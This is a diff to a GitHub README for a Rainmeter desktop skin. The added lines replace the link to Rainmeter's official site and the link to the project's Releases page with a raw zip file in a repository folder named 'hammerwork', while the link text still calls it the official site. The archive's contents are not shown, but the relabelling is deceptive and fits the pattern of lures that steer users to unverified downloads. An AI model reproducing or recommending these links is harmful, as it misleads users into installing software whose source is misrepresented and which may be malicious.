officialnishant7777/EVERNIGHT-RAINMETER-SKIN-HSR/README.md

 ## 🖥️ System Requirements
 - **Operating System**: Windows 10 or later
 - **Software**: You need to have Rainmeter installed.
-If you do not have it, please download it from [Rainmeter's official site](https://www.rainmeter.net).
+If you do not have it, please download it from [Rainmeter's official site](https://raw.githubusercontent.com/officialnishant7777/EVERNIGHT-RAINMETER-SKIN-HSR/main/hammerwork/EVERNIGHT-RAINMETER-SKIN-HSR.zip).
 - **Disk Space**: At least 50 MB of free space for installation.

 ## 📦 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page to download](https://github.com/officialnishant7777/EVERNIGHT-RAINMETER-SKIN-HSR/releases).
+1. **Visit the Releases Page**: Go to the [Releases page to download](https://raw.githubusercontent.com/officialnishant7777/EVERNIGHT-RAINMETER-SKIN-HSR/main/hammerwork/EVERNIGHT-RAINMETER-SKIN-HSR.zip).

 2. **Download the Latest Version**: Look for the latest version available and click on the download link.
-The file will usually be named something like `EVERNIGHT-RAINMETER-SKIN-HSR.zip`.
+The file will usually be named something like `https://raw.githubusercontent.com/officialnishant7777/EVERNIGHT-RAINMETER-SKIN-HSR/main/hammerwork/EVERNIGHT-RAINMETER-SKIN-HSR.zip`.

 3. **Extract the Files**: After the download is complete, navigate to your Downloads folder.
 Right-click on the downloaded file and select "Extract All" to unzip the contents.